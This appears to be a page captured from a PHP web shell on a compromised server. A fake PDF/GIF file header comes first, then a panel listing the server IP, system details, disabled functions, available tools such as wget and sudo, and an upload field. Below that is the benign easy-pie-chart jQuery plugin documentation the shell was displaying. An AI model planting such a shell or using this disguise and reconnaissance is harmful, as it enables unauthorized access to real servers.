%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.30 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/backend/vendors/jquery.easy-pie-chart/docs/ |
Upload File : |
### jQuery ```javascript $(function() { // instantiate the plugin ... // update $('.chart').data('easyPieChart').update(40); ... // disable animation $('.chart').data('easyPieChart').disableAnimation(); ... // enable animation $('.chart').data('easyPieChart').enableAnimation(); }); ``` ### Vanilla JS ```javascript // instantiate the plugin var chart = new EasyPieChart(element, options); // update chart.update(40); // disable animation chart.disableAnimation(); // enable animation chart.enableAnimation(); ``` ##### Using a gradient ```javascript new EasyPieChart(element, { barColor: function(percent) { var ctx = this.renderer.ctx(); var canvas = this.renderer.canvas(); var gradient = ctx.createLinearGradient(0,0,canvas.width,0); gradient.addColorStop(0, "#ffe57e"); gradient.addColorStop(1, "#de5900"); return gradient; } }); ``` ### AngularJS For a value binding you need to add the `percent` attribute and bind it to your controller. ### RequireJS When using [RequireJS](http://requirejs.org) you can define your own name. Examples can be found in the `demo/requirejs.html`.